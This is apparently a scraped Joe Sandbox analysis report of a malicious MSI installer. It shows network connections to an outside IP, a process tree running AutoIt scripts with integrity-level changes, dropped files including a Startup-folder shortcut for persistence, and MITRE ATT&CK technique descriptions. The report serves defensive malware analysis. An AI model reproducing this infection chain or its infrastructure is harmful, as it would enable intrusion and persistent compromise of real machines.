Jul 26, 2023 14:01:14.124579906 CEST	49699	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:14.161727905 CEST	9999	49699	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:14.284281015 CEST	49700	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:14.322448969 CEST	9999	49700	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:14.829849958 CEST	49700	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:14.874561071 CEST	9999	49700	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:15.376637936 CEST	49700	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:15.416196108 CEST	9999	49700	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:15.526289940 CEST	49701	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:15.554184914 CEST	49702	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:15.559758902 CEST	9999	49701	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:15.589715004 CEST	7891	49702	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:15.589864969 CEST	49702	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:15.589994907 CEST	49702	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:15.624844074 CEST	7891	49702	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:15.624886990 CEST	7891	49702	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:15.625071049 CEST	49702	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:15.625096083 CEST	7891	49702	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:15.625353098 CEST	49702	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:15.636919975 CEST	49702	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:15.677680969 CEST	7891	49702	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:15.685345888 CEST	49703	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:15.719986916 CEST	7891	49703	80.66.88.145	192.168.2.4

Target ID:	0
Start time:	14:00:54
Start date:	26/07/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi"
Imagebase:	0x7ff71c140000
File size:	66'048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	3
Start time:	14:00:56
Start date:	26/07/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F
Imagebase:	0x1220000
File size:	59'904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	4
Start time:	14:00:57
Start date:	26/07/2023
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Imagebase:	0x7ff7c72c0000
File size:	29'696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	6
Start time:	14:00:58
Start date:	26/07/2023
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Imagebase:	0x1100000
File size:	52'736 bytes
MD5 hash:	8F8C20238C1194A428021AC62257436D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Target ID:	8
Start time:	14:00:59
Start date:	26/07/2023
Path:	C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
Imagebase:	0x980000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Target ID:	10
Start time:	14:01:05
Start date:	26/07/2023
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Imagebase:	0x940000
File size:	29'696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Target ID:	12
Start time:	14:01:12
Start date:	26/07/2023
Path:	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Imagebase:	0xe20000
File size:	124'632 bytes
MD5 hash:	CFD37109A4E595C2957C5E0ACC198E8A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	13
Start time:	14:01:14
Start date:	26/07/2023
Path:	C:\ProgramData\fkeabad\Autoit3.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3
Imagebase:	0xe90000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 3%, ReversingLabs

Target ID:	14
Start time:	14:01:17
Start date:	26/07/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe
Imagebase:	0xd90000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	15
Start time:	14:01:26
Start date:	26/07/2023
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Imagebase:	0x980000
File size:	138'800 bytes
MD5 hash:	408995FA63F7BA3E059C8E32356B86C4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	18
Start time:	14:01:27
Start date:	26/07/2023
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Imagebase:	0x980000
File size:	138'800 bytes
MD5 hash:	408995FA63F7BA3E059C8E32356B86C4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	20
Start time:	14:01:28
Start date:	26/07/2023
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Imagebase:	0x980000
File size:	138'800 bytes
MD5 hash:	408995FA63F7BA3E059C8E32356B86C4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 15e7232gfN.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\fkeabad\Autoit3.exe

C:\ProgramData\fkeabad\efghhgd.au3

C:\ProgramData\fkeabad\kadfedf\afhbfhd

C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files.cab

C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmp

C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\e004f9e1ae4f094daad741c0c79b7d17.tmp

C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy)

C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\UGtZgHHT.au3 (copy)

C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\msiwrapper.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk

C:\Windows\Installer\5f09c5.msi

C:\Windows\Installer\MSI3403.tmp

C:\Windows\Installer\MSI3433.tmp

C:\Windows\Installer\MSIDAD.tmp

C:\Windows\Installer\SourceHash{229FD164-E132-4ADB-8998-1DB40BF25484}

C:\Windows\Installer\inprogressinstallinfo.ipi

C:\Windows\Logs\DPX\setupact.log

Windows Analysis Report
15e7232gfN.msi

Target ID:	24
Start time:	14:01:45
Start date:	26/07/2023
Path:	C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
Imagebase:	0x400000
File size:	1'256'960 bytes
MD5 hash:	91EE39F4A80F60A938095424EEF2C709
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi

Target ID:	25
Start time:	14:02:10
Start date:	26/07/2023
Path:	C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
Imagebase:	0x1000000
File size:	2'560 bytes
MD5 hash:	FE48113F3A78F980634E8CDACABF5091
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi

Target ID:	26
Start time:	14:02:49
Start date:	26/07/2023
Path:	C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe
Imagebase:	0xed0000
File size:	337'920 bytes
MD5 hash:	29F917BF3DE95D7CE5B6B38CB7A895AB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre